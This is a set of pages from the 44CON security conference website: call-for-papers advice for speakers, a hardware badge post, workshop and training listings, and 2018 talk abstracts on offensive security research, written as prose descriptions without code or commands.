          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

          This is an especially powerful tool for speakers coming from countries where English is a second language. All of our talks are delivered in English. We have some great speakers from across Europe, India and even China, and we want to keep the focus on the content, not on the way it’s conveyed.

          It can be pretty scary delivering a talk in a second or third language, and it’s useful to see you speak, both to reassure voters when you’re delivering a talk, and to determine what help we might be able to offer if your research is brilliant, but you struggle with the language.

          Even if you’re a native English speaker, throwing us a link to earlier talks lets us work out where and when we can put you. We often put more energetic speakers on in the afternoon for example.

          Submit your talks early in the process

          Most of the panel vote in several stages. Almost everyone votes for the first submissions coming in, and slowly dribble off after a while. At several points while the CFP is open, more people will vote, but because there are fewer talks to vote on, we’ve noticed that early talks score higher on average than those submitted later.

          The more votes you get, the better the chance of bringing your voting average up and the better the chance of your talk being accepted. Submitting early gets you more (and often higher) voting scores.

          Remember It’s A Two-Way Street

          We completely understand how much of an effort you put in to come to speak at 44CON. Many of the crew talk at conferences themselves, and understand that you’re giving your time for free to go and speak at an event. That’s why we try to make the talk as cost neutral as possible for you to come and present. When people interact more with the event, and try to get involved, they’re generally more likely to have more positive responses.

          There are certain speakers who come back to 44CON regularly such as Jerry Gamblin, Saumil Shah and Joe Fitzpatrick amongst others, all of whom make really strong efforts to interact with the crew and those attending. If, in your submission, you come across like you’re treating 44CON as just another con to shop the same talk around and disappear, you’re probably going to score lower than someone who comes across as though they really want to be there.

          Coping with rejection

          Our scoring method is not without its faults. No scoring system is perfect, and we’ve had to break bad news to big names as well as people with talks some of us thought were brilliant fits for the event.

          If you don't hear from us straightaway, wait or contact us, don't assume your talk was rejected.
          If your talk was rejected, it’s not an indictment of you or your talk.

          To help you deal with the sting of rejection, remember this:

          1. Your talk not being accepted at 44CON does not mean we thought it was bad.
          2. You absolutely have the right to ask for feedback. It might take a while depending on when you ask, but Steve will personally write back to you with as much detail as he can provide.
          3. We’re all here to learn. If you think that we’ve made a mistake, or have ideas on how we can improve (beyond “accepting my awesome talk next time, dumbasses”), then we want to know.

          Most importantly, your talk not being accepted does not mean we don’t want you to come and enjoy 44CON. We absolutely do want you to come, and will happily offer you a discount on a ticket as a thank you for submitting.

          We want everyone to have a good time at 44CON. If you have any special needs or requests, from assistance with disabilities to being able to bring your kid(s) along just let us know. Unless it’s something we absolutely cannot accommodate, it will have no bearing on your submission’s consideration.

          Getting Started With Your HIDIOT Badge

          Warning: Unlike most software, hardware can permanently damage machines. While every effort has been made to ensure that the 44CON badge will not kill your computer, remember that you built it yourself. Consider using a USB Hub when connecting the HIDIOT. Electrical faults are more likely to kill the hub than your computer. 44CON and Sense/Net Ltd accept no responsibility, both in general and specifically to the use and abuse of your HIDIOT and any damage caused therein.

          Thanks to Akos Rajtmar for the HIDIOT assembly video above

          If you came to 44CON 2016, then congratulations, you are one of about 500 people who have a HIDIOT 0.7 board.

          If you took part in the badge soldering workshop, then congratulations, you are one of <150 people who have a fully functioning HIDIOT 0.7 board.

          But what is a HIDIOT 0.7? And how do you make it do something other than blink? Continue reading “Getting Started With Your HIDIOT Badge”

          Jacob Torrey: Bootstrapping an Architectural Research Platform

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Jacob Torrey – Bootstrapping an Architectural Research Platform

          This talk aims to provide the fundamental architectural knowledge and resources for a security research interested in misuse of the x86 platform to conduct their own research with less “boiler-plate”. Covering the privileges and architectural events that different CPU rings can monitor, a few basic research hypervisors, and new technologies coming into the mainstream; this talk will aid researchers to rapidly focus on the research questions and not the setup.

          Jacob Torrey is an Advising Research Engineer at Assured Information Security, Inc. where he leads the Computer Architectures group and acts as the site lead for the Colorado branch. Jacob has worked extensively with low-level x86 and MCU architectures, having written a BIOS, OS, hypervisor and SMM handler. His major interest is how to (mis)use an existing architecture to implement a capability currently beyond the limitations of the architecture. In addition to his research, Jacob volunteers his time organizing conferences in Denver (RMISC & BSidesDenver) and regular meet-ups across the front range.

          You can follow Jacob on Twitter @JacobTorrey

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Saumil Shah: ARM Shellcode Basics

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our third announcement is Saumil Shah’s workshop: ARM Shellcode Basics

          This is a 2 hour workshop on writing ARM Shellcode from scratch. I will cover some simple ARM assembly, and then we will work on two shellcode examples. A simple execve() shell and a fully working Reverse Shell. We will then test this with two ARM exploits. Attendees are required to bring in their laptops with a working copy of VMWare (Player/Workstation/Fusion). ARM images running on QEMU will be distributed to the participants.

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 15 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, travelling around the world and taking pictures.

          You can follow him on twitter @therealsaumil

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Keynote Talk: Robert Schifreen – Three Decades In Security. What’s Changed, And What Hasn’t.

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our first announcement is for Robert Schifreen’s upcoming keynote – Three Decades In Security. What’s Changed, And What Hasn’t.

          Cybercrime has changed greatly in the last 30 years.  People still hack, but for many different reasons.  The rewards available to hackers are much greater, as are the risks.  But many of the techniques that hackers employ, both technical and psychological, have not changed at all.  Victims still fall for the social engineering tricks and the fake emails.  They still write down passwords.  Compilers still fail to protect programmers from buffer overruns. Programmers still fail to protect themselves from being vulnerable to database injection attacks.

          Have we learned anything in 32 years?  If so, how much, and is it enough?

          In case you were wondering, yes this is that Robert Schifreen. 30 years after the trial that paved the way for the Computer Misuse Act, he has a lot to tell us, and we’re really looking forward to hearing about it.

          Robert Schifreen is the founder of SecuritySmart.co.uk, which provides measurable IT security awareness training. He first became known in the security industry in 1985 when he was the first person in the world to be arrested and tried by a jury in connection with computer hacking. His ultimate acquittal in 1987 on all charges, by the House of Lords (the most supreme court at the time), led to the introduction of the Computer Misuse Act 1990.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          #####EOF##### 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul! Continue reading “Building a cloud security training platform – Pt 2: Infrastructure As Code”

          More 2018 44CON Videos Added

          This week we’ve added another 5 videos from 44CON 2018. We’re also starting to move our older conf talk videos over to the YouTube channel, so if you’d like them to show up in your stream, don’t forget to subscribe to the 44CONtv channel and click the bell to get notifications as new videos go up. From now on, all of our videos will be up on YouTube as soon as the 1s and 0s can carry them. Continue reading “More 2018 44CON Videos Added”

          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts. Continue reading “First Videos From 44CON 2018 Up”

          Building an AWS and Azure security training platform

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

          Part 1 – Proof of Concept

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

          Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

          Continue reading “Building an AWS and Azure security training platform”

          Hacking 44CON’s Pricing Model (5 Different Ways)

          It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?” Continue reading “Hacking 44CON’s Pricing Model (5 Different Ways)”

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          44CONnect – A 1-day invite-only event in March 2019

          44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

          To qualify for an invite, you need to have done one of the following:

          There are 20 tickets available, so make sure you qualify!

          Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

          There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

          Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

          *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

          #####EOF##### 44CON 2016 Training – 44CON

          44CON 2016 Training

          All training courses are run between the 12th and 14th September 2016 at 2 etc venues.

          Presented by: Joe FitzPatrick

          This course introduces and explores attacks on several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience implementing and deploying a number of low-cost hardware devices to enable access, privilege, and deception which is in some cases imperceptible from software. We’ll examine UART, JTAG and SPI interfaces on both ARM and MIPS embedded devices, representative of a wide range of embedded devices that span consumer electronics, medical devices, industrial control hardware, and mobile devices. We will observe, interact with, and exploit each interface to use physical access to enable software privilege.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Saumil Shah

          This year, we bring you a brand new class. The ARM Exploit Laboratory debuts in 2016, bringing you an intense 3 day course featuring a practical hands-on approach to exploit development on ARM based systems.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Presented by: Dawid Czagan

          This course has been cancelled.

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join this unique hands-on training! Dawid Czagan will discuss security bugs that he has found together with Michal Bentkowski in a number of bug bounty programs (including Google, Yahoo, Mozilla, Twitter and others). You will learn how bug hunters think and how to hunt for security bugs effectively. To be successful in bug hunting, you need to go beyond automated scanners. If you are not afraid of going into detail and doing manual/semi-automated analysis, then this hands-on training is for you.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Dominic Chell, MDSec

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack and secure mobile applications on the iOS and Android platforms.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Jordan Wiens, Peter LaFosse & Rusty Wagner

          This course has been cancelled.

          PwnAdventure is a custom 3D MMORPG created for the Ghost in the Shellcode CTF and it’s now been transformed into a hands-on reverse engineering training class. Learn the basics of binary reverse engineering, custom network protocol analysis, all while granting yourself in-game superpowers and pwning newbs with your FPS skills.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Marcus Pinto, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (13th-14th September 2016) at etc.venues Marble Arch

          Presented by: Ashfaq Ansari

          This course has been cancelled.

          This training is focused on exploitation of different Windows Kernel Mode vulnerabilities ranging from Pool Overflow to Use after Free. We will cover basics of Windows Kernel Internals and hands-on fuzzing of Windows Kernel Mode drivers. We will dive deep into exploit development of various kernel mode vulnerabilities. We will also look into different vulnerabilities in terms of code and the mitigations applied to fix the respective vulnerabilities.

          Course Length: 3 days (12th-14th September 2016) at etc.venues The Hatton

          Book your 44CON 2016 training course now!

          #####EOF##### 44CON 2018 Talks – 44CON

          44CON 2018 Talks

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          They’re All Scorpions – Successful SecOps in a Hostile Workplace

          Presented by: Pete Herzog

          Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse- shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your new found stance.

          The UK’s Code of Practice for Security in Consumer IoT Products and Services

          Presented by: David Rogers

          In March 2018, the UK launched its Secure by Design report in order to help defend against security threats, especially for consumer Internet of Things products and services. Over the past few years, poorly secured IoT devices have been hijacked in both targeted as well as large-scale DDoS attacks such as Mirai. In addition to this, poor security can threaten both privacy and safety.

          The speaker, David Rogers authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues with extensive support from the security research community. David will discuss the guidelines within the Code of Practice, why these were prioritised and why the top three became dealing with the password problem, implementing vulnerability disclosure and acting on it and addressing software updates. David will also look at what’s next: what will the challenges be and will the Code of Practice succeed in its aims? How can IoT products possibly be certified and how will the threat landscape change in response to improving security?

          Weak analogies make poor realities – are we sitting on a Security Debt Crisis?

          Presented by: Charl van der Walt

          Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.

          Key theme:
          This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.

          In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.

          Catch Me If You Can: Ephemeral Vulnerabilities in Bug Bounties

          Presented by: Shubham Shah and Michael Gianarakis

          The internet is changing, at a much faster pace today with cloud computing being so easily accessible. As the attack surface of the internet (IPv4) changes there are periods of time where vulnerabilities are present but dissipate quickly.

          By being able to monitor an organisation and effectively determine these changes, we’ve found a number of critical vulnerabilities within networks and applications that are only present for a short period of time. This presentation will detail multiple critical vulnerabilities found by participating in bug bounty programs that we classify as ephemeral vulnerabilities, and the details on how we identified and exploited them in the first place.

          For the Love of Money: Finding and exploiting vulnerabilities in mobile point of sales systems

          Presented by: Leigh-Anne Galloway and Tim Yunusov

          These days it’s hard to find a business that doesn’t accept faster payments. Mobile Point of Sales (mPOS) terminals have propelled this growth lowering the barriers for small and micro-sized businesses to accept non-cash payments. Older payment technologies like mag-stripe still account for the largest majority of all in-person transactions. This is complicated further by the introduction of new payment standards such as NFC. As with each new iteration in payment technology, inevitably weaknesses are introduced into this increasingly complex payment eco-system.

          In this talk, we ask, what are the security and fraud implications of removing the economic barriers to accepting card payments; and what are the risks associated with continued reliance on old card standards like mag-stripe? In the past, testing for payment attack vectors has been limited to the scope of individual projects and to those that have permanent access to POS and payment infrastructure. Not anymore!
          In what we believe to be the most comprehensive research conducted in this area, we consider four of the major mPOS providers spread across the US and Europe; Square, SumUp, iZettle and Paypal. We provide live demonstrations of new vulnerabilities that allow you to MitM transactions, send arbitrary code via Bluetooth and mobile application, modify payment values for mag-stripe transactions, and a vulnerability in firmware; DoS to RCE. Using this sampled geographic approach, we are able to show the current attack surface of mPOS and, to predict how this will evolve over the coming years.

          New to this talk, we will demonstrate how anyone can carry out an attack to send arbitrary code to an mPOS device using simple hardware costing less than £8. The automation of this process allows an attacker to select from a variety of pre-generated messages to send to the mPOS during the transaction process. With this an attacker can tamper with the process to give the appearance that a transaction has been completed when it has not been authorized. Or, a fraudulent merchant could manipulate the process to force a victim to approve multiple transactions.

          Finally, for audience members that are interested in integrating testing practices into their organisation or research practices, we will show you how to use mPOS to identify weaknesses in payment technologies, and how to remain undetected in spite of anti-fraud and security mechanisms.

          Ghost in the Locks – owning electronic locks without leaving a trace

          Presented by: Tomi Tuominen and Timo Hirvonen

          A little over ten years ago, a friend of ours returned to his hotel room to find that his laptop was gone. The door to his room showed no signs of forced entry; there was no record that the electronic lock had been accessed while he was away; and there was certainly no evidence that this electronic lock, deployed on millions of doors in more than 150 countries worldwide, could have been hacked.

          Sometimes hacking boils down to spending more time on something than anyone could reasonably expect. This talk is an ode to that cliché. It is the culmination of a decade-long quest to find out whether the most widely used electronic lock in the world can be bypassed without leaving a trace. And in this adventure, breaking into hotel rooms is only the beginning. But lucky for all of us, unlike most cases of theft from hotel rooms, this story has a happy ending.

          Pwning the 44CON Nerf gun

          Presented by: Chris Wade and Dave Lodge

          Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.

          That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.

          At first, we thought this would be a trivial job: figure out the RF and take control. It turned in to a mammoth hardware, firmware and RF reversing project.

          This puppy is so over-specced it would drive you to tears.

          The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.

          Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.

          We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.

          This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.

          JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and face recognition – and frankly, everywhere else

          Presented by: Guy Barnhart-Magen and Ezra Caltum

          Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulate machine learning systems and the potential these techniques pose for active offensive research.
          The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:

          • Unexpected consequences (why did it decide this rifle is a banana?)
          • Data leakage (how did they know Joe has diabetes)
          • Memory corruption and other exploitation techniques (boom! RCE)
          • Influence the output

          In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
          This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!

          Garbage In, RCE Out 🙂

          Kill All Humans… Bugs! : Machine Learning to the rescue of code review

          Presented by: Philippe Arteau

          Security code reviews with static analysis tools have inherent problems. While many potential vulnerabilities are found quickly, the number of false positives can be overwhelmingly high on large applications (think millions of lines of code). Even with just a few dozen findings, the human fatigue can have a big impact on the triage. Our research addresses these issues by applying machine learning (ML) to automatically triage the output of static analysis tools.

          The objective is to classify vulnerabilities, such as SQL injection or Cross-Site Scripting, using supervised machine learning algorithms. Supervised learning implies that a subset of issues has been classified as false positives or real vulnerabilities. Since algorithms need more than just basic attributes to be efficient, datasets are enriched with various indicators that human look at when reviewing code. Attributes fall in four categories: location (class names, packages, module), data flow sources (method calls, variables’ flow), API (sink, source) and dynamic expression. This talk uncovers the level of effectiveness of these various attributes with common algorithms (random forest, naive Bayes and tree) and releases “Find Security Bugs ML”, a set of open-source tools that builds enriched datasets and classify findings using ML algorithms.

          Additionally, demonstrations will be made to cover the tools’ main functionalities. These include large-scale vulnerability scanning while prioritizing issues presented to reviewers and double checking classification made by developers.

          Applying the tool on Java libraries, including the Spring Framework, allowed us to find some interesting 0-day vulnerabilities. Attendees should be able to replicate similar findings on their enterprise applications or third party’s libraries, even when they don’t have the application’s source code due to Java’s bytecode support.

          So You Want to Red Team?

          Presented by: Lawrence Munro and Matt Lorentzen

          So, you want to be a Red Teamer, but you can’t get into it because you’re not a big enough name, or you lack the opportunities and experience to develop the skill-set? It’s extremely hard to develop your red teaming skills without access to legitimate work within this sphere (or legal, at least!). The skills are advanced and require hours spent in enterprise environments honing your tradecraft, but access to this world can be a chicken and the egg situation.

          In this talk, we discuss the skill differences between pen testing and red teaming and how to break into a red team. We approach the topic from both a career / tactical angle as well as how to close the upskilling gap. We introduce a new open source lab (Fortis), which provides a new approach to simulating user interactions (using unique ‘Digital People’) to help you develop the right skillsets without going out-of-scope and staying on the right side of the law.

          Automating myself out of a job – A pentesters guide to left shifting security testing

          Presented by: Jahmel Harris

          Security is big business. Between security companies trying to sell “security-in-a-box” and infosec professionals charging a fortune to tell devs “you’re doing it wrong”, is it any wonder security is an area that is often deprioritised?

          In this talk, we’ll look at what we should be doing to left shift security testing i.e. make it easier to perform security tests during development. By working harder to integrate ourselves into the development process, we can start to see what can and should be automated (and where a security specialist should actually fit in). We’ll look to understand that writing secure applications does not need to be costly and not all applications need to have the same level of security.

          By using actual vulnerabilities found during pen tests as examples, we will look at the tools and techniques we can use to detect vulnerabilities automatically and early in the development lifecycle, ultimately allowing us to release software often and quickly while still having a good understanding of the application’s risk.

          The aim of this talk will be to understand why security has not kept current with modern development practices and give developers the ability to integrate security into the development pipeline.

          Using SmartNICs to Provide Better Data Center Security

          Presented by: Jack Matheson  assisted by Ahmad Atamlh

          Data Center security has been forced to reinvent itself as software complexity increases, networking capabilities grow more agile, and attack complexity turns unmanageable. With this change, the need for security policy enforcement to be handled at the edge has pushed functionality onto host compute systems, resulting in inherent performance loss and security weakness due to consolidation of resources.

          In the first part of the talk we will be presenting a SmartNIC-based model for data-center security that solves both the performance problem and the security problems of edge-centric policy models. The model features a more robust isolation of responsibilities, superior offload capabilities, significantly better scaling of policy, and unique visibility opportunities.

          To illustrate this, we present a SmartNIC-based reference architecture for network layout, as well as examples of SmartNIC security controls and their resulting threat models.

          The second part of the talk will unveil a new innovative technique for tamper proof host introspection as SmartNICs are in a unique position to analyze and inspect the memory of the host to which they are attached. Normally, this functionality is reserved for a hypervisor, where it is known as ‘guest introspection’ or ‘virtual-machine introspection’. With host introspection, security controls no longer live in the hypervisor, but on the SmartNIC itself, on a separate trust domain. In this way, the visibility normally achieved with guest introspection can be performed for the entire host memory in an isolated and secure area. In order for host introspection to work in the same way as guest introspection, memory is DMA transferred in bursts over the PCI-e bus that attaches the SmartNIC to the host. As this method can be subverted to hide unwanted software, we will demonstrate a novel approach to tamper proof the acquisition of memory and for performing live introspection.

          Host introspection complements the network controls implemented using the SmartNIC by enabling the measurement of the integrity and the behavior of workloads (virtual machines, containers, bare metal servers) to identify possible indicators of compromise. The visibility and context gained also enhances the granularity of network controls, resulting in measurably better security for the data center compared to traditional software-only based controls.

          A live demo will showcase this capability.

          Bypassing Port-Security In 2018 – Defeating MacSEC and 802.1x-2010

          Presented by: Gabriel Ryan

          Existing techniques for bypassing wired port security are limited to attacking 802.1x-2004, which does not provide encryption or the ability to perform authentication on a packet-by-packet basis [1][2][3][4]. The development of 802.1x-2010 mitigates these issues by using MacSEC to provide Layer 2 encryption and packet integrity check to the protocol [5]. Since MacSEC encrypts data on a hop-by-hop basis, it successfully protects against the bridge-based attacks pioneered by the likes of Steve Riley, Abb, and Alva Duckwall [5][6].

          In addition to the development of 802.1x-2010, improved 802.1x support by peripheral devices such as printers also poses a challenge to attackers. Gone are the days in which bypassing 802.1x was as simple as finding a printer and spoofing address, as hardware manufacturers have gotten smarter.

          In this talk, we will introduce a novel technique for bypassing 802.1x-2010 by demonstrating how MacSEC fails when weak forms of EAP are used. Additionally, we will discuss how improved 802.1x support by peripheral devices does not necessarily translate to improved port-security due to the widespread use of weak EAP. Finally, we will consider how improvements to the Linux kernel have made bridge-based techniques easier to implement and demonstrate an alternative to using packet injection for network interaction. We have packaged each of these techniques and improvements into an open source tool called Silent Bridge, which we plan on releasing at the conference.

          References:

          1. https://blogs.technet.microsoft.com/steriley/2005/08/11/august-article-802-1x-on-wired-networks-considered-harmful/
          2. https://www.defcon.org/images/defcon-19/dc-19-presentations/Duckwall/DEFCON-19-Duckwall-Bridge-Too-Far.pdf
          3. https://www.gremwell.com/marvin-mitm-tapping-dot1x-links
          4. https://hackinparis.com/data/slides/2017/2017_Legrand_Valerian_802.1x_Network_Access_Control_and_Bypass_Techniques.pdf
          5. https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-networking-services/deploy_guide_c17-663760.html
          6. https://1.ieee802.org/security/802-1ae/

          Make ARM Shellcode Great Again

          Presented by: Saumil Shah

          Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.

          In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not the least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques. There will be demonstrations of my shellcode on ARM IoT devices featuring different types of ARM architecture. A detailed article shall also be submitted to PoC||GTFO closer to the time of the conference.

          Exploits with Scratch

          Presented by: Kevin Sheldrake

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aims of the talk are to show that the (supposedly) sandboxed Scratch can be used to send evil packets to the network, and also to show that fuzzing and building exploits doesn’t have to involve coding abilities beyond those required to develop in Scratch. In other words, if you (or your child) wishes to learn how to write your own exploits, then this is all possible with Scratch and my experimental extension.

          The talk will cover the intricacies of the Scratch extension API and the limitations that need to be overcome to make it usable, plus how these simple concepts can be strung together to create exploits.

          Subverting Direct X Kernel For Gaining Remote System

          Presented by: Rancho Han and Chen Nan

          Since Edge introduced the win32k filter mechanism, the way of escaping the sandbox from kernel is getting narrower and narrower. In fact, on the latest win10 rs4, most types of GDI objects could not be created in the content process of Edge. In addition, the type isolation makes it very difficult to exploit a win32k bug. This is a huge challenge for breaking Edge sandbox now. However, Edge allows us to access the direct x kernel from the unfiltered syscall functions.

          Last year, Tencent ZhanluLab began to study the Direct X subsystem, and we discovered 10+ bugs in few months. In the first part of this talk, we start with an overview of direct x subsystem and discuss how to analyze its interfaces and internal objects. After that, we explain three bugs representing three typical security flaws. Among the vulnerabilities we discovered, a few of them are very interesting, and it is a bit special to exploit them. We successfully leverage a vulnerability to break the Edge and escalate privilege to system. We will disclose all the details of this exploit in the second part of this talk.

          Insight into fuzzing and pwning of Adobe Flash

          Presented by: Jie Zeng

          In recent years, more hacker attacks (Advanced Persistent Threat) for Adobe Flash Player have taken in the wild. Therefore, Adobe Flash manufacturers have higher security requirements. Various mitigations were added. At the same time more security researchers are also beginning to study the security issues of Adobe Flash, so more and more security vulnerabilities have been discovered.

          This talk will discuss how I found vulnerabilities, and the main Flash attack surface I discovered.

          And then I will carefully explain a few of the representative vulnerabilities that I have discovered, analyse the root cause of the vulnerability, and how the patches are patched.

          Finally, when we have found a vulnerability that want to write exploit, we will encounter many mitigations. So I will talk about the major mitigations that Flash have added, including memory protect, isolators of heaps, CFG and Memory management of Flash.
          So in order to bypass these mitigations the exploit becomes more and more complicated, and I will share a method of memory layout that is still feasible to bypass the isolators of heaps.

          How to Explain Post-Quantum Cryptography to a Middle School Student

          Presented by: Klaus Schmeh

